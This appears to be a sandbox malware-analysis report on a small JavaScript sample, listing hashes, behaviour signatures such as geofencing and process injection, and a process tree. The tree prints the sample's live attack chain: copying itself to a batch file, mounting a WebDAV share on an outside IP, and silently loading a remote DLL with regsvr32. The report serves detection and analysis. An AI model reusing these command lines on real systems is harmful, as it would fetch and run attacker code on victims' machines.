Analysis
-
max time kernel
93s -
max time network
94s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
10/07/2024, 20:08
Static task
static1
Behavioral task
behavioral1
Sample
5425323573023328287.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
5425323573023328287.js
Resource
win10v2004-20240709-en
General
-
Target
5425323573023328287.js
-
Size
5KB
-
MD5
b52e970e962918664d67b103a09ba771
-
SHA1
39f7db5fcef9b3f481752f63d3d9ee970b735abb
-
SHA256
88560515c188c083360d4a20e8cff718de82a3262767cffba43c22477a01862d
-
SHA512
ded06893b4da81a59e16f8cde395e4ab70aa087343e4943fdb01c3864db35bd3f98977e440a9093bf66bf32e0bb1a5fb9d34cd5b941e684773c4ded27f97df3c
-
SSDEEP
96:twHk1JqpvOCz2KoImsSQ8st/1c7iCzcensvaHxmHH0KQUGpZ4RHFptZuGVZJi1Ve:YkqpvDnyeBevFUYbMIvEk1IvT
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 872 wrote to memory of 1212 872 wscript.exe 82 PID 872 wrote to memory of 1212 872 wscript.exe 82 PID 1212 wrote to memory of 1744 1212 cmd.exe 86 PID 1212 wrote to memory of 1744 1212 cmd.exe 86 PID 1212 wrote to memory of 2860 1212 cmd.exe 87 PID 1212 wrote to memory of 2860 1212 cmd.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\5425323573023328287.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\5425323573023328287.js" "C:\Users\Admin\\cyxgmw.bat" && "C:\Users\Admin\\cyxgmw.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:1744
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\734.dll3⤵PID:2860
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5b52e970e962918664d67b103a09ba771
SHA139f7db5fcef9b3f481752f63d3d9ee970b735abb
SHA25688560515c188c083360d4a20e8cff718de82a3262767cffba43c22477a01862d
SHA512ded06893b4da81a59e16f8cde395e4ab70aa087343e4943fdb01c3864db35bd3f98977e440a9093bf66bf32e0bb1a5fb9d34cd5b941e684773c4ded27f97df3c